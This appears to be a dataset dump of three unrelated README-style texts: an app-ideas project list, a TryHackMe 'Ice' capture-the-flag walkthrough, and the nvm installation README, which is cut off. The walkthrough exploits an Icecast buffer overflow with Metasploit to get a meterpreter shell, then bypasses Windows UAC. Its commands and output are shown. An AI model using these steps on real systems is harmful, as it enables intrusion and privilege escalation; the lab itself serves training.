text
stringlengths
9
334k
## 👇 **Practice Daily on iCodeThis.com** 👇 [![iCodeThis](https://www.icodethis.com/banner.jpg)](https://iCodeThis.com/?ref=app-ideas) # :ledger: App Ideas Collection Have you ever wanted to build something but you had no idea what to do? Just as authors sometimes have "writers block" it's also true for developers. This list is intended to solve this issue once and for all! 👍 These applications are: - great for improving your coding skills :muscle:; - great for experimenting with new technologies 🆕; - great for adding to your portfolio to impress your next employer/client :file_folder:; - great for using as examples in tutorials (articles or videos) :page_with_curl:; - easy to complete and also easily extendable with new features :ok_hand:; This is not just a simple list of projects, but a collection that describes each project in enough detail so that you can develop it from the ground up! Each project has the following **features**: 1. A clear and descriptive objective; 2. A list of _User Stories_ which should be implemented (these stories act more as a guideline than a forced list of _To-Do's_. Feel free to add your own stories if you want); 3. A list of bonus features that not only improve the base project, but also your skills at the same time (these are optional and should be attempted only after you have completed the required user stories) 4. All the resources and links to help you find what you need to complete the project Here you can [watch a video about this repository](https://www.youtube.com/watch?v=TNzCfgwIDCY). ## Projects Projects are divided into three tiers based on the knowledge and experience required to complete them. | Tier | Developer Profile | | :--: | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- | | 1 | Developers in the early stages of their learning journey. Those who are typically focused on creating user-facing applications. | | 2 | Developers at an intermediate stage of learning and experience. They are comfortable in UI/UX, using development tools, and building apps that use API services. | | 3 | Developers who have all of the above, and are learning more advanced techniques like implementing backend applications and database services. | 🌟 - New Project ### Tier-1: Beginner Projects | Name | Short Description | Tier | | --------------------------------------------------------------------------------- | ---------------------------------------------------------- | ---------- | | [Bin2Dec](./Projects/1-Beginner/Bin2Dec-App.md) | Binary-to-Decimal number converter | 1-Beginner | | [Border Radius Previewer](./Projects/1-Beginner/Border-Radius-Previewer.md) | Preview how CSS3 border-radius values affect an element | 1-Beginner | | [Calculator](./Projects/1-Beginner/Calculator-App.md) | Calculator | 1-Beginner | | [Christmas Lights](./Projects/1-Beginner/Christmas-Lights-App.md) | Simulate a string of Christmas lights | 1-Beginner | | [Cause Effect App](./Projects/1-Beginner/Cause-Effect-App.md) | Click list item to display item details | 1-Beginner | | [Color Cycle](./Projects/1-Beginner/Color-Cycle-App.md) | Cycle a color value through incremental changes | 1-Beginner | | [Countdown Timer](./Projects/1-Beginner/Countdown-Timer-App.md) | Event Countdown timer | 1-Beginner | | [CSV2JSON App](./Projects/1-Beginner/CSV2JSON-App.md) | CSV to JSON converter | 1-Beginner | | [Dollars to Cents](./Projects/1-Beginner/Dollars-To-Cents-App.md) | Convert dollars to cents | 1-Beginner | | [Dynamic CSS Variables](./Projects/1-Beginner/Dynamic-CSSVar-app.md) | Dynamically change CSS variable settings | 1-Beginner | | [First DB App](./Projects/1-Beginner/First-DB-App.md) | Your first Database app! | 1-Beginner | | [Flip Image](./Projects/1-Beginner/Flip-Image-App.md) | Change the orientation of images across two axes | 1-Beginner | | [GitHub Status](./Projects/1-Beginner/GitHub-Status-App.md) | Display Current GitHub Status | 1-Beginner | | [Hello](./Projects/1-Beginner/Hello-App.md) | User native language greeting | 1-Beginner | | [IOT Mailbox Simulator](./Projects/1-Beginner/IOT-Mailbox-App.md) | Use callbacks to check your snail mail | 1-Beginner | | [JS Input Validation](./Projects/1-Beginner/Javascript-Validation-With-Regex.md) | Script to validate inputs entered by a user using RegEx | 1-Beginner | | [JSON2CSV App](./Projects/1-Beginner/JSON2CSV-App.md) | JSON to CSV converter | 1-Beginner | | [Key Value](./Projects/1-Beginner/Key-Value-App.md) | Keyboard Event Values | 1-Beginner | | [Lorem Ipsum Generator](./Projects/1-Beginner/Lorem-Ipsum-Generator.md) | Generate lorem ipsum placeholder text | 1-Beginner | | [Notes App](./Projects/1-Beginner/Notes-App.md) | Create an online note pad | 1-Beginner | | [Pearson Regression](./Projects/1-Beginner/Pearson-Regression-App.md) | Calculate the correlation coefficient for two sets of data | 1-Beginner | | [Pomodoro Clock](./Projects/1-Beginner/Pomodoro-Clock.md) | Task timer to aid personal productivity | 1-Beginner | | [Product Landing Page](./Projects/1-Beginner/Product-Landing-Page.md) | Showcase product details for possible buyers | 1-Beginner | | [Quiz App](./Projects/1-Beginner/Quiz-App.md) | Test your knowledge by answering questions | 1-Beginner | | [Recipe App](./Projects/1-Beginner/Recipe-App.md) | Recipe | 1-Beginner | | [Random Meal Generator](./Projects/1-Beginner/Random-Meal-Generator.md) | Generate random meals | 1-Beginner | | [Random Number Generator](./Projects/1-Beginner/Random-Number-Generator.md) | Generate random number between range. | 1-Beginner | | [Roman to Decimal Converter](./Projects/1-Beginner/Roman-to-Decimal-Converter.md) | Convert Roman to Decimal numbers | 1-Beginner | | [Slider Design](./Projects/1-Beginner/Slider-Design.md) | Display images using a slider control | 1-Beginner | | [Stopwatch App](./Projects/1-Beginner/Stopwatch-App.md) | Count time spent on activities | 1-Beginner | | [TrueOrFalse](./Projects/1-Beginner/True-or-False-App.md) | Identify the result of a conditional comparison | 1-Beginner | | [Vigenere Cipher](./Projects/1-Beginner/Vigenere-Cipher.md) | Encrypt text using the Vigenere Cypher | 1-Beginner | | [Wind Chill](./Projects/1-Beginner/Windchill-App.md) | Calculate the windchill factor from an actual temperature | 1-Beginner | | [Word Frequency](./Projects/1-Beginner/Word-Frequency-App.md) | Calculate word frequency in a block of text | 1-Beginner | | [Weather App](./Projects/1-Beginner/Weather-App.md) | Get the temperature, weather condition of a city. | 1-Beginner | ### Tier-2: Intermediate Projects | Name | Short Description | Tier | | --------------------------------------------------------------------------------- | -------------------------------------------------- | -------------- | | [Bit Masks](./Projects/2-Intermediate/Bit-Masks-App.md) | Using Bit Masks for Conditions | 2-Intermediate | | [Book Finder App](./Projects/2-Intermediate/Book-Finder-App.md) | Search for books by multiple criteria | 2-Intermediate | | [Calculator CLI](./Projects/2-Intermediate/Calculator-CLI.md) | Create a basic calculator cli. | 2-Intermediate | | [Card Memory Game](./Projects/2-Intermediate/Card-Memory-Game.md) | Memorize and match hidden images | 2-Intermediate | | [Charity Finder App](./Projects/2-Intermediate/Charity-Finder-App.md) | Find a Global Charity to donate to | 2-Intermediate | | [Chrome Theme Extension](./Projects/2-Intermediate/Chrome-Theme-Extension.md) | Build your own chrome theme extention. | 2-Intermediate | | [Currency Converter](./Projects/2-Intermediate/Currency-Converter.md) | Convert one currency to another. | 2-Intermediate | | [Drawing App](./Projects/2-Intermediate/Drawing-App.md) | Create digital artwork on the web | 2-Intermediate | | [Emoji Translator App](./Projects/2-Intermediate/Emoji-Translator-App.md) | Translate sentences into Emoji | 2-Intermediate | | [Flashcards App](./Projects/2-Intermediate/FlashCards-App.md) | Review and test your knowledge through Flash Cards | 2-Intermediate | | [Flip Art App](./Projects/2-Intermediate/Flip-Art-App.md) | Animate a set of images | 2-Intermediate | | [Game Suggestion App](./Projects/2-Intermediate/Game-Suggestion-App.md) | Create polls to decide what games to play | 2-Intermediate | | [GitHub Profiles](./Projects/2-Intermediate/GitHub-Profiles.md) | A GitHub user search App | 2-Intermediate | | [HighStriker Game](./Projects/2-Intermediate/HighStriker-Game.md) | Highstriker strongman carnival game | 2-Intermediate | | [Image Scanner](./Projects/2-Intermediate/Image-Scaner.md) | Image Scanner App | 2-Intermediate | | [Markdown Previewer](./Projects/2-Intermediate/Markdown-Previewer.md) | Preview text formatted in GitHub flavored markdown | 2-Intermediate | | [Markdown Table Generator](./Projects/2-Intermediate/Markdown-Table-Generator.md) | Convert a table into Markdown-formatted text | 2-Intermediate | | [Math Editor](./Projects/2-Intermediate/math-editor.md) | A math editor for students to use | 2-Intermediate | | [Meme Generator App](./Projects/2-Intermediate/Meme-Generator-App.md) | Create custom memes | 2-Intermediate | | [Name Generation using RNNs](./Projects/2-Intermediate/Name-Generator.md) | Generate names using names dataset | 2-Intermediate | | [Password Generator](./Projects/2-Intermediate/Password-Generator.md) | Generate random passwords | 2-Intermediate | | [Podcast Directory](./Projects/2-Intermediate/Podcast-Directory-App.md) | Directory of favorite podcasts | 2-Intermediate | | [QR Code Badge Generator](./Projects/2-Intermediate/QRCode-Badge-App.md) | Encode badge info in a QRcode | 2-Intermediate | | [Regular Expression Helper](./Projects/2-Intermediate/RegExp-Helper-App.md) | Test Regular Expressions | 2-Intermediate | | [Sales Reciepts App](./Projects/2-Intermediate/Sales-DB-App.md) | Record Sales Receipts in a DB | 2-Intermediate | | [Simple Online Store](./Projects/2-Intermediate/Simple-Online-Store.md) | Simple Online Store | 2-Intermediate | | [Sports Bracket Generator](./Projects/2-Intermediate/Sports-Bracket-Generator.md) | Generate a sports bracket diagram | 2-Intermediate | | [String Art](./Projects/2-Intermediate/String-Art.md) | An animation of moving, colored strings | 2-Intermediate | | [This or That Game](./Projects/2-Intermediate/This-or-That-Game.md) | This or That Game | 2-Intermediate | | [Timezone Slackbot](./Projects/2-Intermediate/Timezone-Slackbot.md) | Display Team Timezones | 2-Intermediate | | [To-Do App](./Projects/2-Intermediate/To-Do-App.md) | Manage personal to-do tasks | 2-Intermediate | | [Typing Practice](./Projects/2-Intermediate/Typing-Practice-App.md) | Typing Practice | 2-Intermediate | | [Voting App](./Projects/2-Intermediate/Voting-App.md) | Voting App | 2-Intermediate | ### Tier-3: Advanced Projects | Name | Short Description | Tier | | ----------------------------------------------------------------------------- | ------------------------------------------------------------------- | ---------- | | [Battleship Bot](./Projects/3-Advanced/Battleship-Bot.md) | Create a Discord bot that plays Battleship | 3-Advanced | | [Battleship Game Engine](./Projects/3-Advanced/Battleship-Game-Engine.md) | Create a callable engine to play the Battleship game | 3-Advanced | | [Boole Bots Game](./Projects/3-Advanced/Boole-Bot-Game.md) | Battling Bots driven by Boolean algebra | 3-Advanced | | [Calendar](./Projects/1-Beginner/Calendar-App.md) | Create your own Calendar | 3-Advanced | | [Calorie Counter](./Projects/3-Advanced/Calorie-Counter-App.md) | Calorie Counter Nutrition App | 3-Advanced | | [Chat App](./Projects/3-Advanced/Chat-App.md) | Real-time chat interface | 3-Advanced | | [Contribution Tracker App](./Projects/3-Advanced/Contribution-Tracker-App.md) | Track funds donated to charity | 3-Advanced | | [Elevator](./Projects/3-Advanced/Elevator-App.md) | Elevator simulator | 3-Advanced | | [Fast Food Simulator](./Projects/3-Advanced/FastFood-App.md) | Fast Food Restaurant Simulator | 3-Advanced | | [Instagram Clone](./Projects/3-Advanced/Instagram-Clone-App.md) | A clone of Facebook's Instagram app | 3-Advanced | | [GitHub Timeline](./Projects/3-Advanced/GitHub-Timeline-App.md) | Generate a timeline of a users GitHub Repos | 3-Advanced | | [Kudos Slackbot](./Projects/3-Advanced/Kudos-Slackbot.md) | Give recognition to a deserving peer | 3-Advanced | | [Movie App](./Projects/3-Advanced/Movie-App.md) | Browse, Find Ratings, Check Actors and Find you next movie to watch | 3-Advanced | | [MyPodcast Library](./Projects/3-Advanced/MyPodcast-Library-app.md) | Create a library of favorite podcasts | 3-Advanced | | [NASA Exoplanet Query](./Projects/3-Advanced/NASA-Exoplanet-Query.md) | Query NASA's Exoplanet Archive | 3-Advanced | | [Shell Game](./Projects/3-Advanced/Shell-Game.md) | Animated shell game | 3-Advanced | | [Shuffle Deck](./Projects/3-Advanced/Shuffle-Deck-App.md) | Evaluate different algorithms for shuffling a card deck | 3-Advanced | | [Slack Archiver](./Projects/3-Advanced/Slack-Archiver.md) | Archive Slack Messages | 3-Advanced | | [Spell-It App](./Projects/3-Advanced/SpellIt-App.md) | A twist on the classic Speak N Spell game | 3-Advanced | | [Survey App](./Projects/3-Advanced/Survey-App.md) | Define, conduct, and view a survey | 3-Advanced | ## Plans for the future We are planning to add more and more projects to this repository. For this, we need your help! Find out how to contribute below. 👇 We are also planning to create a website where you can easily browse through all of the projects. ## Contribution Any contributions are highly appreciated. :pray: You can contribute in two ways: 1. create an issue and tell us your idea :bulb:. Make sure that you use the **new idea** label in this case; 2. fork the project and submit a PR with your new idea. Before doing that, please make sure that you read and follow the [Contribution Guide](./CONTRIBUTING.md); ### Examples You can also add your own examples to the projects after you have completed them. I highly encourage you to do this as it will show others what amazing things were built! 👍 ## Spread the word! If the information from this repo was useful to you in any way, make sure you give it a star 🌟, this way others can find it and benefit too! Together we can grow and make our community better! :smiley: Do you have any suggestions on how we could improve this project overall? Let us know! We'd love to hear your feedback! ### Main Contributors 🙂🙂 - **Florin Pop**: [Twitter](https://twitter.com/florinpop1705) - [YouTube Channel](https://youtube.com/florinpop) - [website](https://florin-pop.com). - **Jim Medlock**: [Twitter](https://twitter.com/jd_medlock) - [articles](https://medium.com/@jdmedlock) ## 100Days100Projects 🚀 As a bonus, I created the [#100Days100Projects challenge](https://www.florin-pop.com/blog/2019/09/100-days-100-projects). You can find in there 100 more ideas of smaller projects. Enjoy! 😄 ## Stars history [![Stargazers over time](https://starchart.cc/florinpop17/app-ideas.svg)](https://starchart.cc/florinpop17/app-ideas)
# ICE Deploy & hack into a Windows machine, exploiting a very poorly secured media server. [Ice](https://tryhackme.com/room/ice) ## Topic's * Network Enumeration * CVE-2004-1561 - Icecast 2.0.1 * Metasploit (local_exploit_suggester) * Metasploit (bypassuac_eventvwr) ## [Task 1] Connect Connect to the TryHackMe network! Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up. The virtual machine used in this room (Ice) can be downloaded for offline usage from [https://darkstar7471.com/resources.html](https://darkstar7471.com/resources.html). The sequel to this room, Blaster, can be found [here](https://tryhackme.com/room/blaster). 1. Connect to our network using OpenVPN. Here is a mini walkthrough of connecting: Go to your [access](http://tryhackme.com/access) page and download your configuration file. ![download vpn](https://i.gyazo.com/c86eba5538466dc1d948e09b6f14b53b.png) `No answer needed` 2. Use an OpenVPN client to connect. In my example I am on Linux, on the access page we have a windows tutorial. ![vpn](https://i.gyazo.com/42083cc1831acad79e5a6fa2b235792f.png) (change "ben.ovpn" to your config file) When you run this you see lots of text, at the end it will say Initialization Sequence Completed `No answer needed` 3. You can verify you are connected by looking on your access page. Refresh the page You should see a green tick next to Connected. It will also show you your internal IP address. ![Network Information](https://i.gyazo.com/fad648871fd0e51d1d5590d005329f1c.png) You are now ready to use our machines on our network! `No answer needed` 4. Now when you deploy material, you will see an internal IP address of your Virtual Machine. `No answer needed` ## [Task 2] Recon ![Nmap](https://i.imgur.com/7tFp450.png) Scan and enumerate our victim! 1. Deploy the machine! This may take up to three minutes to start. `No answer needed` 2. Launch a scan against our target machine, I recommend using a SYN scan set to scan all ports on the machine. The scan command will be provided as a hint, however, it's recommended to complete the room '[RP: Nmap](https://tryhackme.com/room/rpnmap)' prior to this room. ``` sudo nmap -sS -sC -sV -p- ice ``` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 14:30 EDT Nmap scan report for ice (10.10.202.247) Host is up (0.039s latency). Not shown: 65523 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 3389/tcp open ssl/ms-wbt-server? 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Service Unavailable 8000/tcp open http Icecast streaming media server |_http-title: Site doesn't have a title (text/html). 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC 49159/tcp open msrpc Microsoft Windows RPC 49160/tcp open msrpc Microsoft Windows RPC Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 0s |_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:55:02:d5:d0:a9 (unknown) | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: Dark-PC | NetBIOS computer name: DARK-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2020-09-14T13:36:35-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-09-14T18:36:35 |_ start_date: 2020-09-14T18:19:23 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 400.13 seconds ``` `No answer needed` 3. Once the scan completes, we'll see a number of interesting ports open on this machine. As you might have guessed, the firewall has been disabled (with the service completely shutdown), leaving very little to protect this machine. One of the more interesting ports that is open is Microsoft Remote Desktop (MSRDP). What port is this open on? `3389` 4. What service did nmap identify as running on port 8000? (First word of this service) `Icecast` 5. What does Nmap identify as the hostname of the machine? (All caps for the answer) ## [Task 3] Gain Access ![Icecast](https://i.imgur.com/FFqM2ZK.png) Exploit the target vulnerable service to gain a foothold! 1. Now that we've identified some interesting services running on our target machine, let's do a little bit of research into one of the weirder services identified: Icecast. Icecast, or well at least this version running on our target, is heavily flawed and has a high level vulnerability with a score of 7.5 (7.4 depending on where you view it). What type of vulnerability is it? Use https://www.cvedetails.com for this question and the next. `execute code overflow` 2. What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000 `CVE-2004-1561` 3. Now that we've found our vulnerability, let's find our exploit. For this section of the room, we'll use the Metasploit module associated with this exploit. Let's go ahead and start Metasploit using the command `msfconsole` `No answer needed` 4. After Metasploit has started, let's search for our target exploit using the command '`search icecast`'. What is the full path (starting with exploit) for the exploitation module? This module is also referenced in 'RP: Metasploit' which is recommended to be completed prior to this room, although not entirely necessary. `exploit/windows/http/icecast_header` 5. Let's go ahead and select this module for use. Type either the command `use icecast` or `use 0` to select our search result. `No answer needed` 6. Following selecting our module, we now have to check what options we have to set. Run the command `show options`. What is the only required setting which currently is blank? `RHOSTS` 7. First let's check that the LHOST option is set to our tun0 IP (which can be found on the access page). With that done, let's set that last option to our target IP. Now that we have everything ready to go, let's run our exploit using the command `exploit` `No answer needed` ## [Task 4] Escalate 1. Woohoo! We've gained a foothold into our victim machine! What's the name of the shell we have now? `meterpreter` 2. What user was running that Icecast process? The commands used in this question and the next few are taken directly from the '[RP: Metasploit](https://tryhackme.com/room/rpmetasploit)' room. ``` meterpreter > getuid ``` ``` Server username: Dark-PC\Dark ``` `Dark` 3. What build of Windows is the system? ``` meterpreter > sysinfo ``` ``` Computer : DARK-PC OS : Windows 7 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows ``` `7601` 4. Now that we know some of the finer details of the system we are working with, let's start escalating our privileges. First, what is the architecture of the process we're running? `x64` 5. Now that we know the architecture of the process, let's perform some further recon. While this doesn't work the best on x64 machines, let's now run the following command `run post/multi/recon/local_exploit_suggester`. *This can appear to hang as it tests exploits and might take several minutes to complete* ``` meterpreter > run post/multi/recon/local_exploit_suggester ``` ``` [*] 10.10.202.247 - Collecting local exploits for x86/windows... [*] 10.10.202.247 - 30 exploit checks are being tried... [+] 10.10.202.247 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [+] 10.10.202.247 - exploit/windows/local/ikeext_service: The target appears to be vulnerable. [+] 10.10.202.247 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 10.10.202.247 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable. [+] 10.10.202.247 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable. [+] 10.10.202.247 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.202.247 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.202.247 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. ``` `No answer needed` 6. Running the local exploit suggester will return quite a few results for potential escalation exploits. What is the full path (starting with exploit/) for the first returned exploit? `exploit/windows/local/bypassuac_eventvwr` 7. Now that we have an exploit in mind for elevating our privileges, let's background our current session using the command `background` or `CTRL + z`. Take note of what session number we have, this will likely be 1 in this case. We can list all of our active sessions using the command `sessions` when outside of the meterpreter shell. `No answer needed` 8. Go ahead and select our previously found local exploit for use using the command `use FULL_PATH_FOR_EXPLOIT` ``` use exploit/windows/local/bypassuac_eventvwr ``` `No answer needed` 9. Local exploits require a session to be selected (something we can verify with the command `show options`), set this now using the command `set session SESSION_NUMBER` `No answer needed` 10. Now that we've set our session number, further options will be revealed in the options menu. We'll have to set one more as our listener IP isn't correct. What is the name of this option? `LHOST` 11. Set this option now. You might have to check your IP on the TryHackMe network using the command `ip addr` `No answer needed` 12. After we've set this last option, we can now run our privilege escalation exploit. Run this now using the command `run`. Note, this might take a few attempts and you may need to relaunch the box and exploit the service in the case that this fails. ``` msf5 exploit(windows/local/bypassuac_eventvwr) > run [*] Started reverse TCP handler on 192.168.178.52:4444 [*] UAC is Enabled, checking level... [+] Part of Administrators group! Continuing... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [*] Configuring payload and stager registry keys ... [*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe [+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute. [*] Cleaning up registry keys ... [*] Exploit completed, but no session was created. ``` `No answer needed` 13. Following completion of the privilege escalation a new session will be opened. Interact with it now using the command `sessions SESSION_NUMBER` ``` msf5 exploit(windows/local/bypassuac_eventvwr) > sessions 1 [*] Starting interaction with 1... meterpreter > ``` `No answer needed` 14. We can now verify that we have expanded permissions using the command `getprivs`. What permission listed allows us to take ownership of files? ``` meterpreter > getprivs Enabled Process Privileges ========================== Name ---- SeChangeNotifyPrivilege SeIncreaseWorkingSetPrivilege SeShutdownPrivilege SeTimeZonePrivilege SeUndockPrivilege ``` `No answer needed` 15. We can now verify that we have expanded permissions using the command `getprivs`. What permission listed allows us to take ownership of files? `SeTakeOwnershipPrivilege` ## [Task 5] Looting ![](https://i.imgur.com/1kmEdf6.png) Learn how to gather additional credentials and crack the saved hashes on the machine. 1. Prior to further action, we need to move to a process that actually has the permissions that we need to interact with the lsass service, the service responsible for authentication within Windows. First, let's list the processes using the command `ps`. Note, we can see processes being run by NT AUTHORITY\SYSTEM as we have escalated permissions (even though our process doesn't). ## [Task 6] Post-Exploitation ## [Task 7] Extra Credit
<a href="https://github.com/nvm-sh/logos"> <picture> <source media="(prefers-color-scheme: dark)" srcset="https://raw.githubusercontent.com/nvm-sh/logos/HEAD/nvm-logo-white.svg" /> <img src="https://raw.githubusercontent.com/nvm-sh/logos/HEAD/nvm-logo-color.svg" height="50" alt="nvm project logo" /> </picture> </a> # Node Version Manager [![Build Status](https://app.travis-ci.com/nvm-sh/nvm.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.39.4-yellow.svg)][4] [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/684/badge)](https://bestpractices.coreinfrastructure.org/projects/684) <!-- To update this table of contents, ensure you have run `npm install` then `npm run doctoc` --> <!-- START doctoc generated TOC please keep comment here to allow auto update --> <!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE --> ## Table of Contents - [Intro](#intro) - [About](#about) - [Installing and Updating](#installing-and-updating) - [Install & Update Script](#install--update-script) - [Additional Notes](#additional-notes) - [Troubleshooting on Linux](#troubleshooting-on-linux) - [Troubleshooting on macOS](#troubleshooting-on-macos) - [Ansible](#ansible) - [Verify Installation](#verify-installation) - [Important Notes](#important-notes) - [Git Install](#git-install) - [Manual Install](#manual-install) - [Manual Upgrade](#manual-upgrade) - [Usage](#usage) - [Long-term Support](#long-term-support) - [Migrating Global Packages While Installing](#migrating-global-packages-while-installing) - [Default Global Packages From File While Installing](#default-global-packages-from-file-while-installing) - [io.js](#iojs) - [System Version of Node](#system-version-of-node) - [Listing Versions](#listing-versions) - [Setting Custom Colors](#setting-custom-colors) - [Persisting custom colors](#persisting-custom-colors) - [Suppressing colorized output](#suppressing-colorized-output) - [Restoring PATH](#restoring-path) - [Set default node version](#set-default-node-version) - [Use a mirror of node binaries](#use-a-mirror-of-node-binaries) - [.nvmrc](#nvmrc) - [Deeper Shell Integration](#deeper-shell-integration) - [bash](#bash) - [Automatically call `nvm use`](#automatically-call-nvm-use) - [zsh](#zsh) - [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file) - [fish](#fish) - [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file-1) - [Running Tests](#running-tests) - [Environment variables](#environment-variables) - [Bash Completion](#bash-completion) - [Usage](#usage-1) - [Compatibility Issues](#compatibility-issues) - [Installing nvm on Alpine Linux](#installing-nvm-on-alpine-linux) - [Alpine Linux 3.13+](#alpine-linux-313) - [Alpine Linux 3.5 - 3.12](#alpine-linux-35---312) - [Uninstalling / Removal](#uninstalling--removal) - [Manual Uninstall](#manual-uninstall) - [Docker For Development Environment](#docker-for-development-environment) - [Problems](#problems) - [macOS Troubleshooting](#macos-troubleshooting) - [WSL Troubleshooting](#wsl-troubleshooting) - [Maintainers](#maintainers) - [License](#license) - [Copyright notice](#copyright-notice) <!-- END doctoc generated TOC please keep comment here to allow auto update --> ## Intro `nvm` allows you to quickly install and use different versions of node via the command line. **Example:** ```sh $ nvm use 16 Now using node v16.9.1 (npm v7.21.1) $ node -v v16.9.1 $ nvm use 14 Now using node v14.18.0 (npm v6.14.15) $ node -v v14.18.0 $ nvm install 12 Now using node v12.22.6 (npm v6.14.5) $ node -v v12.22.6 ``` Simple as that! ## About nvm is a version manager for [node.js](https://nodejs.org/en/), designed to be installed per-user, and invoked per-shell. `nvm` works on any POSIX-compliant shell (sh, dash, ksh, zsh, bash), in particular on these platforms: unix, macOS, and [windows WSL](https://github.com/nvm-sh/nvm#important-notes). <a id="installation-and-update"></a> <a id="install-script"></a> ## Installing and Updating ### Install & Update Script To **install** or **update** nvm, you should run the [install script][2]. To do that, you may either download and run the script manually, or use the following cURL or Wget command: ```sh curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.4/install.sh | bash ``` ```sh wget -qO- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.4/install.sh | bash ``` Running either of the above commands downloads a script and runs it. The script clones the nvm repository to `~/.nvm`, and attempts to add the source lines from the snippet below to the correct profile file (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`). <a id="profile_snippet"></a> ```sh export NVM_DIR="$([ -z "${XDG_CONFIG_HOME-}" ] && printf %s "${HOME}/.nvm" || printf %s "${XDG_CONFIG_HOME}/nvm")" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm ``` #### Additional Notes - If the environment variable `$XDG_CONFIG_HOME` is present, it will place the `nvm` files there.</sub> - You can add `--no-use` to the end of the above script (...`nvm.sh --no-use`) to postpone using `nvm` until you manually [`use`](#usage) it. - You can customize the install source, directory, profile, and version using the `NVM_SOURCE`, `NVM_DIR`, `PROFILE`, and `NODE_VERSION` variables. Eg: `curl ... | NVM_DIR="path/to/nvm"`. Ensure that the `NVM_DIR` does not contain a trailing slash. - The installer can use `git`, `curl`, or `wget` to download `nvm`, whichever is available. - You can instruct the installer to not edit your shell config (for example if you already get completions via a [zsh nvm plugin](https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/nvm)) by setting `PROFILE=/dev/null` before running the `install.sh` script. Here's an example one-line command to do that: `PROFILE=/dev/null bash -c 'curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.4/install.sh | bash'` #### Troubleshooting on Linux On Linux, after running the install script, if you get `nvm: command not found` or see no feedback from your terminal after you type `command -v nvm`, simply close your current terminal, open a new terminal, and try verifying again. Alternatively, you can run the following commands for the different shells on the command line: *bash*: `source ~/.bashrc` *zsh*: `source ~/.zshrc` *ksh*: `. ~/.profile` These should pick up the `nvm` command. #### Troubleshooting on macOS Since OS X 10.9, `/usr/bin/git` has been preset by Xcode command line tools, which means we can't properly detect if Git is installed or not. You need to manually install the Xcode command line tools before running the install script, otherwise, it'll fail. (see [#1782](https://github.com/nvm-sh/nvm/issues/1782)) If you get `nvm: command not found` after running the install script, one of the following might be the reason: - Since macOS 10.15, the default shell is `zsh` and nvm will look for `.zshrc` to update, none is installed by default. Create one with `touch ~/.zshrc` and run the install script again. - If you use bash, the previous default shell, your system may not have `.bash_profile` or `.bashrc` files where the command is set up. Create one of them with `touch ~/.bash_profile` or `touch ~/.bashrc` and run the install script again. Then, run `. ~/.bash_profile` or `. ~/.bashrc` to pick up the `nvm` command. - You have previously used `bash`, but you have `zsh` installed. You need to manually add [these lines](#manual-install) to `~/.zshrc` and run `. ~/.zshrc`. - You might need to restart your terminal instance or run `. ~/.nvm/nvm.sh`. Restarting your terminal/opening a new tab/window, or running the source command will load the command and the new configuration. - If the above didn't help, you might need to restart your terminal instance. Try opening a new tab/window in your terminal and retry. If the above doesn't fix the problem, you may try the following: - If you use bash, it may be that your `.bash_profile` (or `~/.profile`) does not source your `~/.bashrc` properly. You could fix this by adding `source ~/<your_profile_file>` to it or follow the next step below. - Try adding [the snippet from the install section](#profile_snippet), that finds the correct nvm directory and loads nvm, to your usual profile (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`). - For more information about this issue and possible workarounds, please [refer here](https://github.com/nvm-sh/nvm/issues/576) **Note** For Macs with the M1 chip, node started offering **arm64** arch darwin packages since v16.0.0 and experimental **arm64** support when compiling from source since v14.17.0. If you are facing issues installing node using `nvm`, you may want to update to one of those versions or later. #### Ansible You can use a task: ```yaml - name: Install nvm ansible.builtin.shell: > curl -o- 